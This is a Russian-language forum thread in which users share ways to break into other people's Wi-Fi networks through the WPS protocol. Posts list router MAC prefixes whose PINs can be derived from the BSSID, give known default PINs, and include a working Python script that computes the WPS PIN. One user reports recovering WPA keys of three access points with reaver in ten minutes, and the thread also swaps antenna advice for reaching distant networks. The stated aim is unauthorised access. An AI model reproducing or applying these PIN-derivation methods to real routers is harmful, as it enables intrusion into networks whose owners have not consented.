Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,426
    Reputations:
    377
    Лично я занес в эту базу все ближайшие точки доступа в своем районе с помощю приложения для андройд.
    Как сказано в описании приложения:" Если вы не нашли Wi-Fi точек поблизости, пожалуйста, включите "Сканирование" и походите по городу. Для лучшей точности обязательно включите GPS. Это поможет составить карту покрытия вашего города для вас и всех остальных пользователей. Найденные вами точки будут отправлены на сервер и появятся на карте через один-два дня."

    Так что не вижу проблем, кроме как найти телефон на андройде.
     
    _________________________
  2. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    а нафига тебе нужна была антенна АП15М?я имею ввиду именно М....это морская типа,заточена по морские условия,в городе нафига она?так а чего связка плохая?антенна плохая разве?а что за канадский вариант?дорогая?альфа на 19 точно дорогая,видел....по моему больше 100$......нафиг она нужна,тем более что у тебя уже куча точек открытых....денег девать некуда? :)
     
  3. 4pips

    4pips Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    529
    Likes Received:
    1,421
    Reputations:
    40
    To Carlson
    Две точки с началом EC-43-F6 были открыты путем пересчета из 16 в 10. У одной пин действительно 003900ХХ, а вот у другой 427152ХХ. Получается, что не у всех пины лежат в начальном диапазоне. Но метод из 16 в 10 эффективен и к ним. Проверь у себя.
     
  4. Carlson

    Carlson Well-Known Member

    Joined:
    15 Jul 2013
    Messages:
    252
    Likes Received:
    417
    Reputations:
    16
    Проверил на двух точках. Выдают действительные пины точек (у обеих). Метод действительно применим и к ним! Где ж ты раньше то был со своим сообщением??? :D
    Капитулировали перед тупым брутом WPS за пару месяцев до сообщения.
    На мою точку в этой базе не рассчитывайте :D После этого и других подобных форумов отключил WPS, сменил МАС на произвольный, поставил пасс не подлежащий даже запоминанию и вообще вещание в эфир включаю ОЧЕНЬ редко. Фобия короче говоря. :D
    Собственно говоря, а какая разница между АП-15 и АП-15М. Была белого, стала чёрного цвета? АП-15 применяли и в море и на суше. И чем морская антенна отличается от "неморской". Герметичным исполнением, прочностью, углами атаки. Это есть и в альфах. Меня в данном случае больше интересует зависимость чувствительности от качества исполнения... Сначала испытание пройдёт на суше, она должна заслужить, чтобы её тащили в бауле в рейс. Чем эта связка неудобна для моря? Тем, что НЕ герметичен сам адаптер. Придётся добывать герметичный бокс, а внутрь вкладывать пакеты с силикагелем (для поглощения конденсата). Достойный канадские варианты лишёны этого недостатка. Адаптеры встроены в корпус самой антенны:
    http://www.ebay.com/itm/49dBm-802-11b-g-WIFI-USB-CPE-Antenna-RANGE-EXTENDER-BOOSTER-REPEATER-CATCHER-/360450628134?pt=US_Networking_Boosters_Extenders_Antennas&hash=item53ec881a26
    Уже меющийся вариант этого производителя с антенной 14 db и встроенным адаптером показал себя с самой лучшей стороны. БОльшая часть точек капитулировали ей. Работает без проблем что в Бектреках и Xiopan-ах, так и Wifislax-ах. Угол по горизонтали до 60 градусов, компактнее и легче АП-15М. Но дальность чуть меньше.
    на ebay.com цена 75 мёртвых президентов.
    Антенны нужны для сравнения, выбора из них лучших и использования в море. Это дома интерес "спортивный", а в море там не до спорта, нет проводного, надо интернет ДОБЫТЬ из "воздуха". Если пролетаешь в выборе, то пролетаешь надолго.
    P.S. Зафлудили мы тему о WPS выбором оборудования, а для этого отдельная тема выбора антенн в соседней ветке есть.
     
    #924 Carlson, 17 Oct 2013
    Last edited: 17 Oct 2013
  5. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    ТАК А ЧТО,всё таки это плохая связка:альфа и АП15?
     
  6. vik991

    vik991 New Member

    Joined:
    18 Sep 2013
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    ОТЛИЧНАЯ.ОДИН минус воды боится.очень хорошо--ALFA tube-U (G) +ап 15 или Alfa APA-L2419
     
  7. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    ну а ещё что хорошее кроме ап15?по такми же ценам.....просто APA-L2419 уж дороговата....
     
  8. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    странно...она же внешняя....как так она вдруг воды боится :eek:
     
  9. vik991

    vik991 New Member

    Joined:
    18 Sep 2013
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    альфа обычная воды боится
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    По моим наблюдениям, этот способ прокатывает также на BSSID-ах, начинающихся с:
    00:14:D1 (TRENDnet, редко попадается, пин подошёл лишь к одному)
    14:A9:E3 (MST CORPORATION, роутеры Beeline N150L, они по своей сути ZyXEL)
    90:94:E4 (D-Link International, роутеры DIR-620)
    CC:5D:4E (ZyXEL)
    C8:6C:87 (ZyXEL)
    B0:B2:DC (ZyXEL)
    EC:43:F6 (ZyXEL)
    FE:F5:28 (тоже ZyXEL, но по базе не пробивает)
     
  11. 4pips

    4pips Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    529
    Likes Received:
    1,421
    Reputations:
    40
    Наблюдаю в эфире 11 точек с началом 00-14-D1. Ни к одной метод удачным не был. Видимо надо различать дальнейшие данные мак-адреса или была просто небольшая партия, которой присваивали пин таким образом.
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Для 00:14:D1 попробуй ещё этот пин:
    95661469

    Он у меня к 7-ми тренднетам подошёл. Но это тоже мало, относительно полного списка проверенных.
     
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Внезапно, алгоритм подошёл к 3 из 7 ASUS-ов, начинающихся с 90:E6:BA:
    Code:
    [+] 90:E6:BA:BE:CE:51 - 25046571
    [-] 90:E6:BA:51:D3:A1 - 94476064
    [-] 90:E6:BA:4F:16:6A - 74824137
    [-] 90:E6:BA:79:C5:F5 - 59193630
    [+] 90:E6:BA:D3:1F:2C - 38360763
    [+] 90:E6:BA:BE:D5:13 - 25063875
    [-] 90:E6:BA:9E:16:EF - 15179586
     
  14. 4pips

    4pips Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    529
    Likes Received:
    1,421
    Reputations:
    40
    Спасибо за полезную информацию. У Асусов бросилось в глаза то, что большие адреса (у которых нужно отбросить первую единицу) получили пин таким образом, кроме последнего.
     
  15. henri2002

    henri2002 Active Member

    Joined:
    25 Sep 2013
    Messages:
    379
    Likes Received:
    282
    Reputations:
    3
    калькулятором.
     
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Всё просто:
    1. Берёшь три последних байта из BSSID
    2. Копируешь их в калькулятор в Hex режиме (шестнадцатиричном)
    3. Переводишь в Dec режим (десятичный)
    4. Полученное число обрезаешь до 7 цифр от старшего разряда (mod 10000000)
    5. Вычисляешь последнюю цифру (контрольную сумму) пина по алгоритму WPS PIN Checksum

    Этот же алгоритм используется в проге WPSPIN на ведройд.

    Вот, я по-быстрому сделал скрипт на питоне для генерации пина по алгоритму (на базе easybox_wps.py) :
    Code:
    #!/usr/bin/env python
    import sys, re
    
    def gen_pin (mac_str):
        pin = int(mac_str[6:12], 16) % 10000000
    
        # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
            # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
        accum = 0
        t = pin
        while (t):
            accum += 3 * (t % 10)
            t /= 10
            accum += t % 10
            t /= 10
        return '%07i%i' % (pin, (10 - accum % 10) % 10)
    
    def main():
        if len(sys.argv) != 2:
            sys.exit('usage: wpspin.py [BSSID]\n eg. wpspin.py CC:5D:4E:11:22:33\n')
    
        mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    	
        if len(mac_str) != 12:
            sys.exit('check MAC format!\n')
    
        print 'WPS pin:', gen_pin(mac_str)
    
    if __name__ == "__main__":
        main()
     
    #936 binarymaster, 18 Oct 2013
    Last edited: 18 Oct 2013
    1 person likes this.
  17. Klaatu

    Klaatu Member

    Joined:
    21 Nov 2012
    Messages:
    554
    Likes Received:
    69
    Reputations:
    8
    Спасибо за скрипт, обнаружил еще вот что:
    B8:A3:86
    64:70:02
    По первому маку статистики пока нет, т.к. он только один раз мне встретился. Второй - два раза, метод 16/10 подошел только к одному.
     
  18. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    БЛИН....кто как определяет где примерно точки расположены?а то чесно напрягает.....поствил антенну так,набрал wash,посмотрел сигнал.....опять покрутил антенну и тд......просто,фиг знает,где точка раположена:справа,слева,чуть нижу,чуть выше и тд.....или проги есть какие то?Вы как вычисляете где точки?просто,когда сигнал -20,то понятно,что прм за стенкой точка,у соседа.....а вот -60 и тд....фиг поймёшь,например я на 3-этаже.....точка может быть на первом,на 5,в другом подъезде и тд....
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    По B8:A3:86 у меня такая выборка:
    Code:
    B8:A3:86:1A:E5:84 - 32144154
    B8:A3:86:1B:01:08 - 95286457
    B8:A3:86:1B:02:E0 - 37057442
    B8:A3:86:1F:1F:30 - 55880190
    B8:A3:86:1F:39:62 - 04677925
    B8:A3:86:42:83:C6 - 46264848
    B8:A3:86:43:7C:4D - 46264848
    B8:A3:86:45:20:A1 - 76229909
    B8:A3:86:52:AC:AB - 81995882
    B8:A3:86:53:1A:50 - 54981973
    B8:A3:86:6B:55:44 - 31411219
    B8:A3:86:6B:55:C0 - 13374655
    Ни к одному алгоритм 16/10 не подошёл, зато видны популярные для D-Link-ов пины 46264848 и 76229909.

    А по 64:70:02 (TP-LINK) у меня вообще 1 запись...
    Code:
    64:70:02:73:B3:5C - 99587581
    ________________________________________

    попробуй вафле-скан, тут:
    http://stascorp.com/load/

    (расположен в блоке "Веб приложения" справа, со значком радара)
     
    #939 binarymaster, 18 Oct 2013
    Last edited: 18 Oct 2013
  20. Carlson

    Carlson Well-Known Member

    Joined:
    15 Jul 2013
    Messages:
    252
    Likes Received:
    417
    Reputations:
    16
    Я оказался неправ... :D
    Вчера по ошибке введя в reaver лишь СЕМЬ цифр (не указав последнюю) был приятно удивлён... Reaver сам подобрал последнюю и выдал PSK. :D И так три точки подряд. 10 минут - ещё трём точкам "капут".
    EC:43:F6 - ZyXEL
    90:94:E4 - DIR
    C8: D3:A3 - DIR
    Кажется ещё совсем недавно думал что WPA-WPA2 практически неуязвимы. Защита с 1 секундой. :D
     
    #940 Carlson, 19 Oct 2013
    Last edited: 19 Oct 2013